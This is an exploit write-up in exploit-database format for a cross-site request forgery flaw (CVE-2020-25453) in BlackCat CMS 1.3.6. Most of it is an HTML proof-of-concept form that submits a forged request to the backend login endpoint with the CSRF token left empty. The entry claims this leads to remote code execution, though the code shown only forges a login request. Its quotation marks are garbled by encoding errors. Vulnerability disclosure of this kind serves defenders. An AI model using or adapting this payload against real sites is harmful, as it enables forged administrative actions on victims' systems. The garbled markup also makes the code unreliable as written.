# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery # Date: 2020-06-01 # Exploit Author: Noth # Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS # Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS # Version: v1.3.6 # CVE : CVE-2020-25453 BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution . PoC (Remove the csrf_token value) : <input type=“hidden†name=“__csrf_magic†value=“â€/> ------------------------------------------------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState(",",'/')</script> <form action=“ http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php â€method=“POSTâ€> <input type=“hidden†name=“__csrf_magic†value=“â€/> <input type=“hidden†name=“username_fieldname†value=“username_274807982ed4â€/> <input type=“hidden†name=“password_fieldname†value=“password_75868428f837â€/> <input type=“hidden†name=“_cat_ajax†value=“1â€/> <input type=“hidden†name=“username_274807982ed4†value=“accountnameâ€/> <input type=“hidden†name=“password_75868428f837†value=“yourpasswordâ€/> <input type=“submit†value=“Submit requestâ€/> </form> </body> </html>